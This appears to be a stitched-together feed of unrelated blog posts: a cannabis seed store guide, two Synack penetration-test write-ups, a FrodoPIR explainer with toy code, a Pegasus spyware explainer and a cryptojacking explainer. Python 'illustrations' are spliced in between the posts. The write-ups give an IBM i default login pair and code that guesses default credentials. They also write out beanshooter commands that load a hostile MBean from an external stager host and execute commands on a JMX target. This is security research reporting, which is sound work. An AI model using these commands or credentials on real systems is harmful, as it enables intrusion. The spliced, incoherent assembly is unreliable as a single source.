
Cannabis Seed Genetics Explained

By: TeamVault


Cannabis Seed Genetics Explained: Grow Your Dream Strain with The Vault

So, you’ve got your grow lights set up, your soil primed, and your excitement through the roof—but how much do you really know about the genetics of the cannabis seeds you’re planting? If you’re serious about growing top-shelf cannabis, understanding cannabis genetics is the secret sauce. And trust me, once you get the hang of it, choosing seeds from The Vault Cannabis Seed Store will feel like picking out a legendary Pokemon!

In this blog, we’ll demystify cannabis seed genetics and explain why they matter for every grower, whether you’re just starting or already have a few bountiful harvests under your belt. Let’s unlock the door to a world of knowledge that can help you grow the strain of your dreams.

The Basics: What Are Cannabis Seed Genetics?

When we talk about cannabis seed genetics, we’re essentially talking about a plant’s DNA. Just like in humans and animals, the genetic makeup of a cannabis plant dictates its appearance, growth habits, and effects. Whether it will grow tall and lanky or short and bushy, produce dense buds or airy flowers, be rich in THC or packed with CBD—all of these traits are written in its genetic code.

In cannabis, genetics determine:

Strain type (Sativa, Indica, Hybrid)
Cannabinoid profile (THC, CBD, CBG, etc.)
Terpene profile (those tasty aromatic compounds!)
Growth traits (height, yield, flowering time)
Resistance to pests, diseases, and environmental conditions
To make it easy, think of cannabis seed genetics like the ultimate blueprint for your plant. Choose wisely, and you could end up with a strain that checks off every box on your wish list.

Indica vs. Sativa vs. Hybrid: The Classic Debate

Before we dive into more complex genetic details, let’s cover the basics of Indica, Sativa, and Hybrid strains. If you’re new to growing, you’ll likely see these terms everywhere, and they’re foundational to understanding cannabis seed genetics.

Indica

Indica strains are often short, bushy, and suited to colder climates. They’re known for producing a “body high”—that warm, relaxing sensation that leaves you glued to the couch and binge-watching your favorite shows. They typically have shorter flowering times, which makes them appealing for growers looking to harvest sooner rather than later.

Common traits of Indica plants include:

Shorter height (great for indoor grows)
Broad leaves
Relaxing, sedative effects
Shorter flowering time (usually 6-9 weeks)
Popular Indica strains you can snag from The Vault Cannabis Seed Store include Northern Lights and Granddaddy Purple.

Sativa

On the flip side, Sativa strains are tall, lanky, and thrive in warmer climates. These plants are known for their “head high”—a cerebral, uplifting effect that pairs well with creativity and focus. If you’re a day-time user or want a strain that helps you feel energized and inspired, Sativa is your go-to.

Common traits of Sativa plants include:

Taller height (sometimes up to 12 feet!)
Narrow leaves
Uplifting, energetic effects
Longer flowering time (usually 10-14 weeks)
Some popular Sativa seeds at The Vault include Amnesia Haze and Durban Poison.

Hybrid

Then there are Hybrid strains, which are a blend of both Indica and Sativa genetics. These strains give growers and consumers the best of both worlds, often combining the relaxation of Indica with the mental stimulation of Sativa. Hybrids can lean more towards one side or be a true 50/50 split, offering a wide range of effects.

For a hybrid experience, check out strains like Blue Dream or Girl Scout Cookies, both available at The Vault Cannabis Seed Store.

The Importance of Parent Genetics: It’s All in the Family

If you’ve ever heard of a strain being referred to as the “child” of two other strains, you’re not imagining things. Cannabis plants, like animals, have parents. Breeders combine strains (called “crossing”) to develop specific traits, and the offspring (your seeds) inherit traits from both the mother and father plants. It’s like playing with the ultimate genetic toolkit!

For example, if a breeder wants a strain that grows fast (Indica trait) but also produces high yields (Sativa trait), they might cross an Indica-dominant strain with a high-yielding Sativa. The resulting strain might be exactly what they were aiming for—or it might not. Breeding is both an art and a science, and that’s why the genetics behind your seeds are so important.

At The Vault Cannabis Seed Store, you’ll notice strains like White Widow or OG Kush that have been used to breed many of the most popular hybrids on the market today. Knowing the lineage of your strain gives you insights into what you can expect during your grow.

Landrace Strains: The Originals

Let’s talk about landrace strains, which are like the ancient ancestors of today’s cannabis. These strains developed naturally in specific geographic regions, without human interference, and are often the purest forms of Indica or Sativa genetics you can find. Think of them as the OGs of the cannabis world.

Some famous landrace strains include Afghani, Thai, and Durban Poison. While modern hybrid strains might offer more specialized effects or better yields, landrace strains offer a piece of cannabis history and some of the purest genetics available. If you’re a purist or a cannabis historian, growing landrace strains can be an exciting way to experience cannabis in its original form.

Feminized vs. Regular Seeds: The Genetic Dilemma

When shopping for seeds, you’ll come across terms like feminized and regular. This is another crucial aspect of cannabis seed genetics that every grower should understand.

Feminized Seeds

Most growers opt for feminized seeds because they take the guesswork out of sexing plants. Feminized seeds are not genetically engineered: a female plant is induced to produce pollen, and another female pollinated with it yields seeds that carry no male chromosome, so they grow into female plants. That matters because only female plants produce the resinous buds we all love.

Pros: No need to worry about male plants, which means no accidental pollination or wasted space.
Cons: Some growers argue that feminized seeds might not be as genetically stable as regular seeds, but with high-quality breeders, this isn’t usually an issue.
At The Vault, you can find an extensive selection of feminized seeds, such as Purple Punch and Wedding Cake.

Regular Seeds

Regular seeds give you both male and female plants, meaning you’ll need to sex them and remove the males if you’re only after those glorious buds. However, regular seeds are favored by breeders who want to create new strains by crossing male and female plants.

Pros: Potential to breed your own strains.

Cons: You’ll need to watch out for males unless you’re specifically breeding.

The Vault also stocks an impressive range of regular seeds, like Skunk #1, for those adventurous growers looking to tinker with genetics.

Autoflowering Genetics: The Quick Grower’s Dream

Another genetic factor that’s shaking up the cannabis world is autoflowering seeds. Unlike traditional photoperiod strains, which depend on light cycles to flower, autoflowering strains will automatically switch from vegetative growth to flowering after a certain amount of time, regardless of light exposure.

Autoflowering seeds are often created by breeding cannabis strains with Cannabis ruderalis, a wild, hardy cannabis species known for its ability to flower quickly. These plants tend to be smaller and have shorter grow cycles, making them perfect for beginners or those with limited space and time.

For a speedy grow, check out autoflowering strains like Auto Gorilla Glue or Auto White Widow at The Vault Cannabis Seed Store.

Why Buy from The Vault Cannabis Seed Store?

Alright, now that you’re a cannabis genetics whiz, let’s talk about why The Vault Cannabis Seed Store is the best place to shop for cannabis seeds. Whether you’re looking for landrace strains, hybrid powerhouses, or autoflowering seeds, The Vault offers:

A vast selection of premium genetics from trusted breeders.
Feminized, regular, and autoflowering options to suit every grower’s needs.
Discreet worldwide shipping to ensure your seeds arrive safely.
Exclusive promotions and freebies to make your purchase even sweeter.

Conclusion

Cannabis seed genetics are the backbone of every successful grow. Whether you’re after a relaxing Indica, an energetic Sativa, or a balanced Hybrid, understanding the genetics of your seeds is crucial to growing the perfect plant. And with the wide range of high-quality seeds available at The Vault Cannabis Seed Store, you’re just a click away from growing your dream strain. So what are you waiting for? Get growing today!

Newsletter Sign Up

Make sure you never miss another Vault promo – sign up for our newsletter

Remember: It is illegal to germinate cannabis seeds in many countries including the UK.  It is our duty to inform you of this fact and to urge you to obey all of your local laws to the letter.  The Vault only ever sells or sends out seeds for souvenir, collection or novelty purposes.

The post Cannabis Seed Genetics Explained first appeared on Cannabis Seeds News.

Exploits Explained: Default Credentials Still a Problem Today

Popeax is a member of the Synack Red Team.

People often assume security research requires deep knowledge of systems and exploits, and sometimes it does. In this case, though, all it took was some curiosity and a web search to find an alarmingly simple issue: default credentials.

On a recent host engagement, I discovered an unusual login page on port 8080, a standard alternate HTTP port. The login page did not resemble anything I had seen in the thousands of login pages across hundreds of client engagements.

Nothing new there. Even for a seasoned member of the Synack Red Team (SRT), it isn’t unusual to run into commercial products one hasn’t seen before.

The login page clearly identified the product as running on some type of IBM server, and the URL contained the string “profoundui.” A quick Internet search turned up an IBM resource stating:

“Profound UI is a graphical, browser-based framework that makes it easy to transform existing RPG applications into Web applications, or develop new rich Web and mobile applications that run on the IBM i (previously known as the AS/400, iSeries, System i) platform using RPG, PHP, or Node.js.”

Given that Profound UI runs on IBM i, I searched for “IBM AS/400 default password” and found IBM documentation listing the default IBM i user profiles and their default passwords.

As any elite hacker would do, I copied and pasted all six default username/password pairs into the login form.

Sure enough, the last pair worked: user QSRVBAS with password QSRVBAS.

Proceeding further to see how much access those credentials granted was beyond the scope of the engagement. The vulnerability was documented in the report delivered to the client for remediation.

After a few days, the client requested a patch verification through Synack’s patch verification workflow, which lets a client ask the SRT to verify an implemented fix within the Synack Platform. After receiving the request, I quickly confirmed that the vulnerability was no longer exploitable.

It is hard to believe, but even today commercial products still ship and are installed with default credentials. Often the onus is on the end user to know that the credentials must be changed and the default accounts locked. On IBM i specifically, the ANZDFTPWD (Analyze Default Passwords) command lists user profiles whose password still equals the profile name and can disable those profiles or expire their passwords; running it after installation closes exactly the hole described here.

The ingenuity and curiosity of the SRT cannot be replicated by scanners or automated tooling. SRT members are adept at finding this type of vulnerability in custom and commercial applications, even when the application is running in an obscure location, and surfacing the exploitable result to the customer.
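The following Python is an added illustration, not code from the Synack post: it captures the procedure above (try each vendor default once, record the hit) as a reusable audit function with a per-account attempt budget, run against a constructed mock of the login form so it works offline. Only QSRVBAS/QSRVBAS is confirmed on the page; the other profile names are the well-known IBM i service profiles that historically shipped with the password equal to the profile name, which you should verify against current IBM documentation. The budget matters: IBM i’s QMAXSIGN system value disables a profile after a small number of failed sign-ons (default 3), so a careless spray can lock out QSECOFR on the target you are trying to help.

```python
"""Default-credential audit with a per-profile attempt budget.

Added illustration, not code from the Synack post. It runs the logic the post
describes (try each vendor default pair once, record what works) against a
constructed mock login function so it works offline. Only QSRVBAS/QSRVBAS is
confirmed on the page; the other names are the well-known IBM i profiles that
shipped with password == profile name (assumption: check current IBM docs).
The attempt budget models IBM i's QMAXSIGN system value, which disables a
profile after a small number of failed sign-ons (default 3)."""
from dataclasses import dataclass, field
from typing import Callable, Iterable, Tuple

IBM_I_DEFAULT_PROFILES = ("QSECOFR", "QSYSOPR", "QPGMR", "QUSER", "QSRV", "QSRVBAS")

# Outcomes a login function reports back.
OK, DENIED, LOCKED = "ok", "denied", "locked"
LoginFn = Callable[[str, str], str]


def default_pairs(profiles: Iterable[str] = IBM_I_DEFAULT_PROFILES):
    """Vendor defaults for these profiles: the password equals the profile name."""
    return [(p, p) for p in profiles]


@dataclass
class AuditResult:
    attempts: int = 0
    found: list = field(default_factory=list)   # (user, password) pairs that worked
    locked: list = field(default_factory=list)  # profiles the target reported disabled


def audit_default_credentials(login: LoginFn, pairs: Iterable[Tuple[str, str]],
                              max_attempts_per_user: int = 1) -> AuditResult:
    """Try each default pair, never exceeding max_attempts_per_user guesses per
    account. One guess per profile stays under QMAXSIGN, so the audit cannot
    itself disable QSECOFR or the other service profiles."""
    result = AuditResult()
    attempts_by_user: dict = {}
    for user, password in pairs:
        if attempts_by_user.get(user, 0) >= max_attempts_per_user:
            continue  # budget exhausted for this account: skip, never spray
        attempts_by_user[user] = attempts_by_user.get(user, 0) + 1
        result.attempts += 1
        outcome = login(user, password)
        if outcome == OK:
            result.found.append((user, password))
        elif outcome == LOCKED and user not in result.locked:
            result.locked.append(user)
    return result


def make_mock_login(valid: dict, lockout_threshold: int = 3) -> LoginFn:
    """Constructed stand-in for the target's login form: accepts the pairs in
    `valid` and disables a profile after `lockout_threshold` failures."""
    failures: dict = {}
    disabled: set = set()

    def login(user: str, password: str) -> str:
        if user in disabled:
            return LOCKED
        if valid.get(user) == password:
            return OK
        failures[user] = failures.get(user, 0) + 1
        if failures[user] >= lockout_threshold:
            disabled.add(user)
            return LOCKED
        return DENIED

    return login


if __name__ == "__main__":
    # Constructed target: only QSRVBAS still has its default, as in the post.
    target = make_mock_login({"QSRVBAS": "QSRVBAS", "QSECOFR": "changed-at-install"})
    res = audit_default_credentials(target, default_pairs())
    print(f"{res.attempts} attempts; working defaults: {res.found}; locked: {res.locked}")
```

Against a real target, replace make_mock_login with a function that submits the form and maps the HTTP response to ok/denied/locked; the audit logic, and in particular the one-guess-per-profile budget, does not change.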

The post Exploits Explained: Default Credentials Still a Problem Today appeared first on Synack.

Exploits Explained: Java JMX’s Exploitation Problems and Resolutions

Nicolas Krassas is a member of the Synack Red Team and has earned distinctions such as SRT Envoy and Guardian of Trust.

Of all the Synack targets, my favourites have always been host assessments: there you find a multitude of services with different configurations, versions and usage. One that always gave me trouble was Java RMI, until I decided to spend time reviewing the process step by step.

Over the years there were several targets where skilled Synack Red Team (SRT) members successfully exploited it for Remote Code Execution, and that knowledge was largely missing from my arsenal. I set myself the goal of finding out how that exploitation works, and of understanding the tools and methods well enough to find and exploit it myself.

A few “good to know” items:

What is Java RMI used for?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

What is JMX?

Wikipedia describes Java Management Extensions (JMX) as follows, “Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks.”

JMX is often described as the “Java version” of SNMP (Simple Network Management Protocol). SNMP is mainly used to monitor network components such as switches and routers; JMX is likewise used for monitoring, in its case of Java-based applications. The most common use case is monitoring the availability and performance of a Java application server from a central monitoring solution such as Nagios, Icinga or Zabbix.

JMX shares another similarity with SNMP: while most companies only use the monitoring capabilities, it is actually much more powerful. JMX does not just let a user read values from the remote system; it can also be used to invoke methods on it, and that is the capability every attack below builds on.

JMX fundamentals: MBeans

JMX allows you to manage resources as managed beans (MBean). An MBean is a Java Bean class that follows certain design rules of the JMX standard. An MBean can represent a device, an application or any resource that needs to be managed over JMX. You can access these MBeans via JMX, query attributes and invoke Bean methods.

The JMX standard distinguishes between several MBean types; here we only deal with standard MBeans. To be a valid standard MBean, a Java class must:

  • Implement a management interface named after the class with the suffix MBean (a class Hello implements HelloMBean)
  • Provide a public constructor (a no-argument one if the MBean server is to create the bean itself)
  • Follow the JavaBeans naming conventions, for example getter/setter methods to expose attributes for reading and writing; every other public method of the interface becomes a remotely invocable operation

MBean server

An MBean server is the registry for the MBeans of a JVM, and it is what we will see abused in the attack later in this post. Developers register their MBeans in the server under an ObjectName that follows a fixed pattern (domain:key=value, for example com.example:type=Hello). The MBean server routes incoming requests to the registered MBeans and forwards notifications from MBeans to external components.

Once a JMX service is exposed over RMI, we can go through the various ways such a service might be attacked. Over time, several attack techniques related to JMX over RMI have been discovered, and we will step through most of them one by one.

Abusing available MBeans

Applications can register additional MBeans, which can then be invoked remotely. Since JMX is commonly used to manage applications, those MBeans are often very powerful, and with no authentication on the connector every one of their operations is available to whoever can reach the port.

A failed start

Starting research on the topic, the first items one sees are references to rmiscout, an excellent tool when it was created but not maintained for over two years, with several deployment issues. I then moved on to BaRMIe, which is surprisingly even older than rmiscout but easier to work with for basic recon. An alternative tool, mjet, seems more up to date and somewhat easier to use, but my results were still poor. As one can see, simply taking a tool off the shelf and trying to make it work is often not a solution.

Back to school

Simply using the tools without understanding exactly what they do won’t work in the long run, and I knew that from the start. But everybody looks for shortcuts. So back to reading, starting with a couple of blog posts on the subject. I ended up at a relatively recent presentation by Tobias Neitzel, where he also presented his tools, remote-method-guesser (RMG) and beanshooter.

New tools, new methods

With a better understanding and a pair of excellent tools, the results over the following months were as follows.

On a target that had already been live for several weeks, the RMI service had not been noticed or exploited. The following steps produced an RCE.

Enumeration of the JMX endpoint:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar enum server_ip 9999

Tonka bean deployment (beanshooter loads its own MBean into the target from a URL we control; the jar is served by a stager on our Tupoc, an external Synack collaborator system, so the local stager is suppressed with --no-stager):

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy server_ip 9999 --stager-url http://tupoc:8888 --no-stager

On the Tupoc, waiting for the callback:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar stager xxx.xx.xx.xx 8888 tonka

Verification:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka status server_ip 9999 

Command execution:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka exec server_ip 9999 id

The case was awarded as a full RCE.

Not every case will be this straightforward, and on rare occasions issues will arise, but with a better understanding of the process and the tools we are always able to achieve better results.
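The defender’s side of the walkthrough above, as an added Python illustration that is not part of the Synack post or of beanshooter: it parses the com.sun.management.jmxremote.* flags from JVM command lines and reports the combination that makes the enum/deploy/exec sequence possible (a remote port with authentication or SSL switched off), next to a hardened configuration. The process lines are constructed; the only assumption about the JVM is that a set jmxremote.port publishes an RMI connector reachable from the network unless something outside the JVM blocks it.

```python
"""Audit JVM command lines for a remotely reachable JMX connector without auth.

Added illustration, not code from the Synack post or from beanshooter. It looks
only at the standard com.sun.management.jmxremote.* system properties and
judges the flag combination; the sample process lines are constructed.
Assumption: a JVM that sets jmxremote.port publishes an RMI connector that is
reachable from the network unless something outside the JVM blocks it."""
import re
import shlex

JMX = "com.sun.management.jmxremote"


def jmx_properties(cmdline: str) -> dict:
    """Collect -Dcom.sun.management.jmxremote* properties from a java command
    line. A bare -Dcom.sun.management.jmxremote (no '=') is stored as 'true'."""
    props = {}
    for tok in shlex.split(cmdline):
        if not tok.startswith("-D" + JMX):
            continue
        key, sep, value = tok[2:].partition("=")
        props[key] = value if sep else "true"
    return props


def assess_jmx(cmdline: str) -> dict:
    """Return whether the JVM exposes a remote connector and why it is risky.
    Absent properties take the JVM defaults: authenticate=true, ssl=true."""
    p = jmx_properties(cmdline)
    port = p.get(JMX + ".port")
    if port is None:
        return {"exposed": False, "port": None, "findings": []}
    findings = []
    if p.get(JMX + ".authenticate", "true").lower() == "false":
        findings.append("authentication disabled: anyone who reaches the port "
                        "can read attributes, invoke operations and load MBeans")
    if p.get(JMX + ".ssl", "true").lower() == "false":
        findings.append("ssl disabled: credentials and serialized calls cross "
                        "the network in the clear")
    if JMX + ".rmi.port" not in p:
        findings.append("rmi.port unset: the connector's data channel lands on "
                        "a random port, so a firewall rule for the registry "
                        "port alone does not contain it")
    return {"exposed": True, "port": int(port), "findings": findings}


def audit_process_list(ps_text: str) -> list:
    """Run assess_jmx over 'PID COMMAND' lines and keep the JVMs that expose JMX."""
    hits = []
    for line in ps_text.splitlines():
        m = re.match(r"\s*(\d+)\s+(java\b.*)$", line)
        if not m:
            continue
        verdict = assess_jmx(m.group(2))
        if verdict["exposed"]:
            hits.append({"pid": int(m.group(1)), **verdict})
    return hits


# Constructed sample: the first JVM is the classic wide-open configuration that
# beanshooter-style tooling exploits, the second is the hardened equivalent.
SAMPLE_PS = """\
1842 java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 \
-Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -jar app.jar
2210 java -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.rmi.port=9010 \
-Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password \
-Dcom.sun.management.jmxremote.access.file=/etc/jmx/jmxremote.access -jar billing.jar
3305 java -jar worker.jar
"""

if __name__ == "__main__":
    for hit in audit_process_list(SAMPLE_PS):
        print(f"pid {hit['pid']} exposes JMX on {hit['port']}: "
              f"{hit['findings'] or 'no issues found'}")
```

Run it over `ps -eo pid,args` output on the hosts you own; a JVM reported with the first finding is the enum/deploy/exec sequence above waiting to happen, and the fix is the second sample line: authentication via password and access files (or a JAAS login config), SSL left on, and rmi.port pinned so the service can actually be firewalled.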

References:
  • https://www.youtube.com/watch?v=t_aw1mDNhzI (Tobias Neitzel’s presentation; amazing work)
  • https://docs.jboss.org/jbossas/jboss4guide/r5/html/ch2.chapter.html
  • https://docs.alfresco.com/content-services/7.0/admin/jmx-reference/

Final notes

During the process a few issues were identified in the tools and were handled swiftly; in addition, an issue was filed against the GlassFish repository: https://github.com/eclipse-ee4j/glassfish/issues/24223.

The post Exploits Explained: Java JMX’s Exploitation Problems and Resolutions appeared first on Synack.

FrodoPIR: New Privacy-Focused Database Querying System Explained

FrodoPIR is a single-server private information retrieval (PIR) scheme, designed by researchers at Brave, that lets a client fetch a record from a server’s database without the server learning which record was fetched. Its security rests on the Learning With Errors (LWE) problem, the same lattice assumption behind post-quantum key exchange.

In a traditional database query, the client tells the server which records it wants, and the server sends them back. The server therefore learns the client’s interests, and that access pattern can expose sensitive information about the client’s activities even when the data itself is public.

FrodoPIR solves this by encrypting the request itself. Conceptually the client wants to send the unit vector f_i (a 1 in position i, 0 elsewhere) so that the server can compute f_i · D = d_i, the i-th row of the database D. Sending f_i in the clear would reveal i, so the client hides it inside an LWE sample: the query is b = s·A + e + Δ·f_i, where A is a public matrix derived from a seed, s is the client’s secret, e is small random noise and Δ = q/p scales the index into the high bits. Under LWE this vector is indistinguishable from random, so the server learns nothing about i. The server multiplies the query by the whole database and returns the result; the client, having precomputed s·(A·D) from a hint A·D that the server published once, subtracts it and rounds away the noise to recover d_i. This is not the same as mixing real and decoy queries: a decoy scheme still tells the server that the target is one of a small set, while a PIR query reveals nothing at all.

The name nods to FrodoKEM, a key encapsulation mechanism built on the same “plain” LWE assumption without ring structure; FrodoPIR is a separate scheme that reuses that design philosophy, not a variant of the KEM. The trade-off is cost: as with every PIR scheme, the server must touch the entire database on every query (any row it skipped would reveal that the client did not want it), and the client must download the hint, whose size grows with the database, once before querying.
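The round trip described above, reduced to a toy with the FrodoPIR structure (plain LWE matrix arithmetic), as an added Python illustration; it is not the authors’ implementation, and the parameters are deliberately tiny and insecure, chosen only so that the rounding step always succeeds. Names follow the scheme’s notation (A, D, M = A·D, s, e, b, c, Δ); the database contents are constructed.

```python
"""Toy single-server PIR with the FrodoPIR structure (plain LWE).

Added illustration, not the authors' implementation. Parameters are tiny and
deliberately insecure; they are chosen so that decoding always succeeds.
Notation follows the scheme: A (public matrix from a seed), D (database),
M = A*D (public hint), s (client secret), e (noise), b = s*A + e, c = s*M,
DELTA = q // p. The database contents are constructed."""
import random

N = 64          # LWE dimension (length of the secret s)
M_ROWS = 32     # database rows; a query hides its index among these
W = 8           # entries per row
Q = 2 ** 32     # ciphertext modulus
P = 16          # plaintext modulus: every database entry is in [0, P)
DELTA = Q // P  # the encoded index lives in the top bits, the noise in the low bits


def derive_matrix(seed: int, rows: int, cols: int):
    """Public LWE matrix A expanded from a seed (a PRG in the real scheme)."""
    rng = random.Random(seed)
    return [[rng.randrange(Q) for _ in range(cols)] for _ in range(rows)]


def vec_mat(v, mat):
    """Row vector times matrix, mod Q."""
    cols = len(mat[0])
    out = [0] * cols
    for vi, row in zip(v, mat):
        for j in range(cols):
            out[j] = (out[j] + vi * row[j]) % Q
    return out


class Server:
    def __init__(self, db, seed: int = 1234):
        assert all(len(r) == W and all(0 <= x < P for x in r) for r in db)
        self.db, self.seed = db, seed
        A = derive_matrix(seed, N, M_ROWS)            # N x M_ROWS
        self.hint = [vec_mat(row, db) for row in A]   # M = A*D, published once

    def answer(self, query):
        # The server's only online work: the query times the *whole* database.
        # Skipping any row would reveal that the client did not want it.
        return vec_mat(query, self.db)


class Client:
    def __init__(self, seed: int, hint, client_seed: int = 99):
        self.A = derive_matrix(seed, N, M_ROWS)       # same A as the server
        self.hint = hint
        self.rng = random.Random(client_seed)

    def prepare(self):
        """Offline: one LWE sample b = s*A + e and the matching c = s*M.
        Each (b, c) pair must be used for exactly one query."""
        s = [self.rng.randrange(Q) for _ in range(N)]
        e = [self.rng.choice((-1, 0, 1)) for _ in range(M_ROWS)]
        b = [(x + ei) % Q for x, ei in zip(vec_mat(s, self.A), e)]
        return b, vec_mat(s, self.hint)

    def query(self, i: int, b):
        """Online: b + DELTA*f_i, i.e. add DELTA only at the wanted index."""
        q = list(b)
        q[i] = (q[i] + DELTA) % Q
        return q

    def decode(self, response, c):
        """response - c = e*D + DELTA*d_i; e*D is small, so rounding drops it."""
        return [round(((r - cj) % Q) / DELTA) % P for r, cj in zip(response, c)]


def make_demo_db(seed: int = 7):
    """Constructed database of M_ROWS rows with W small entries each."""
    rng = random.Random(seed)
    return [[rng.randrange(P) for _ in range(W)] for _ in range(M_ROWS)]


def retrieve(server: Server, client: Client, i: int):
    """Full round trip for row i; the server only ever sees the query vector."""
    b, c = client.prepare()
    return client.decode(server.answer(client.query(i, b)), c)


if __name__ == "__main__":
    db = make_demo_db()
    server = Server(db)
    client = Client(server.seed, server.hint)
    for i in (0, 17, M_ROWS - 1):
        assert retrieve(server, client, i) == db[i]
    print("all rows retrieved correctly without revealing the index")
```

Rounding works because |e·D| is bounded by M_ROWS·(P−1) while Δ is q/P, so the noise never reaches the bits that carry d_i; in the real scheme that inequality is what fixes the parameter choice. Note also that prepare() is the expensive step and is independent of the index, which is why FrodoPIR’s client can batch it offline.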

FrodoPIR has a number of potential applications in settings such as healthcare, finance and online advertising, and it can protect user privacy in collaborative data analysis tasks, such as those involving distributed machine learning.

Its main advantage over earlier single-server PIR schemes is simplicity and speed: no homomorphic-encryption library, just matrix arithmetic modulo q, with most of the work moved to an offline phase that does not depend on the query. This is particularly useful where sensitive or personal data is stored, because the access pattern itself can no longer reveal which record a user cared about.

The post FrodoPIR: New Privacy-Focused Database Querying System Explained appeared first on OFFICIAL HACKER.

Pegasus Spyware Explained: Biggest Questions Answered

Computer technology has long been touted as a valuable asset in the modern world, to the point that the next world war is sometimes predicted to be fought in cyberspace. Lending weight to that prediction, there have been reports that several governments around the world have been illegally tracking prominent politicians and journalists with Pegasus, spyware made by the Israeli company NSO Group.

What is Pegasus Spyware?

Named after the mythical winged horse, Pegasus (a program used to remotely monitor a target’s phone) was created by NSO Group Technologies, based near Tel Aviv. Pegasus has been linked to several international incidents, from the capture of a Mexican drug lord to the alleged WhatsApp compromise that exposed Amazon founder Jeff Bezos’s private messages.

It came under scrutiny again after a report said thousands of prominent people around the world may have been targeted with the spyware.

How does Pegasus Spyware work?

Over the years, Pegasus has used various methods to infect a device. Earlier versions relied on spear phishing: a malicious link was sent to the target, and once it was clicked Pegasus gained access to the device; within a few hours the phone’s data was being transferred to the operator.

Smartphone security has since improved, and the spyware now relies on “zero-click” attacks, in which the operator infects the target device without any action from the potential victim.

Pegasus therefore no longer has to wait for a link to be clicked; it has infected phones through something as simple as a WhatsApp call that the victim did not even need to answer.

Who is spying?

NSO Group works closely with the Israeli government, which is widely assumed to make the most of Pegasus’s surveillance capabilities.

Other clients have not been left out, as the company licenses the technology to a select group of governments around the world. Reported foreign clients include India, Azerbaijan, Bahrain, Hungary, Kazakhstan, Mexico, Morocco, Rwanda, Saudi Arabia and the United Arab Emirates.

Who is the target?

While it is impossible to gauge precisely how extensively any government uses Pegasus, the spyware has tended to be aimed at journalists, primarily those seen as a problem by the government in question.

One such case in which Pegasus was allegedly used surrounds the murder of Saudi journalist and dissident Jamal Khashoggi in 2018: phones of people close to him were reportedly targeted before and after his death.

Who is working to stop Pegasus Spyware?

The nonprofit Forbidden Stories, the human rights organization Amnesty International and a global network of more than 80 journalists from 17 media organizations came together to investigate how governments use Pegasus to spy illegally on people of interest.

The investigation is called the Pegasus Project. Its reports were based on a leaked list of some 50,000 phone numbers belonging to people who may have been selected as targets for infection.

What is the position of the Indian government?

The reports named the Indian government as one of NSO Group’s foreign clients for Pegasus. The leaked list of potential targets included the phone numbers of over 40 Indian journalists from various media outlets, and forensic analysis confirmed a Pegasus attack on at least 10 of the listed phones.

The Indian government and NSO Group have both rejected the allegations. The Indian government stated that “a commitment to free speech as a fundamental right is the cornerstone of India’s democratic system,” while the Israeli company simply denied that the report had anything to do with it.

The post Pegasus Spyware Explained: Biggest Questions Answered appeared first on OFFICIAL HACKER.

What do you mean by Crypto Jacking?

Innovation and technology advance by leaps and bounds, and every day brings new features or programs to the digital world. But every coin has two sides: technological advances bring development and improvement, and they also bring new opportunities for cybercrime.

We see a steady stream of news about data breaches and malicious attacks. Meanwhile the fashion for cryptocurrencies keeps growing; everyone wants to invest and make a fortune in a market that is high-risk, high-reward and largely unregulated.

Cybercriminals have long relied on spear phishing, social engineering, malware distribution and website defacement, but from September 2017 cryptojacking swept across the Internet and quickly became one of the most prevalent forms of malware.

Here we discuss one of the most common cybercrimes, namely crypto jacking.

What is Crypto Jacking?

In cryptojacking, a criminal gains unauthorized access to a device without the owner’s consent. Unlike most threats it is designed to stay completely hidden from the victim, and it is unusual in that it is not necessarily after the user’s data: what it wants is the device’s processing power.

It is malicious cryptocurrency mining. Criminals break into work and personal computers, laptops and mobile devices and install mining software that uses the device’s CPU, GPU and electricity to mine cryptocurrency for them; some campaigns also steal cryptocurrency wallets found on the device, but the defining trait of cryptojacking is the theft of computing resources.

Much of this malware is built on XMRig, a legitimate open-source miner that malware authors bundle and run without the owner’s knowledge. It is done by people who want the profit of mining without bearing its risks and costs.

That is the simple reason cryptojacking keeps growing in popularity among criminals: mining Bitcoin or any other cryptocurrency legitimately is expensive. You have to pay for mining hardware, large electricity bills and much more.

The currency most often mined on hijacked personal devices is Monero, which can be mined on ordinary CPUs and is hard to trace, making it attractive to criminals. The attackers behind the WinstarNssmMiner campaign mined 133 Monero, roughly $26,500 at the time. The motivation behind a cryptojacking attack is simple: money.

Mining can be very profitable, but turning a profit is hard without funds to cover the significant costs. Cryptojacking is growing, and attackers keep coming up with new ways to steal computing resources. One estimate put the share of organizations that experienced cryptojacking activity in their cloud environments in a single year at up to 25%.

Researchers have also uncovered cryptojacking campaigns that use the leaked NSA exploit EternalBlue to infect vulnerable Windows servers. Cryptojacking is an increasingly popular way for criminals to extract money from their targets in the form of cryptocurrency, which makes some investors back off or think twice about entering the market.

How Crypto Jacking is done?

Criminals get mining code onto devices in two main ways.

The first is to trick the victim into installing it. A phishing email lures the victim into clicking a malicious link or opening an attachment that downloads the mining code; the code then runs silently in the background on the victim’s device for as long as it stays installed.

The second, often called drive-by cryptomining, works like malvertising: a piece of JavaScript is embedded in a web page or in an ad served across many sites, and it runs automatically whenever the page loads in a visitor’s browser. In this variant nothing is saved on the victim’s device; the mining runs only while the page is open.

In both cases the code performs the hashing work of mining on the victim’s hardware and sends the results to a server controlled by the attacker.

Cryptojacking does not even require much technical skill. Some mining payloads carry worm-like functionality that lets them spread to other devices and servers on the network, which also makes them harder to find and remove; staying persistent on the network is in the cryptojacker’s financial interest.

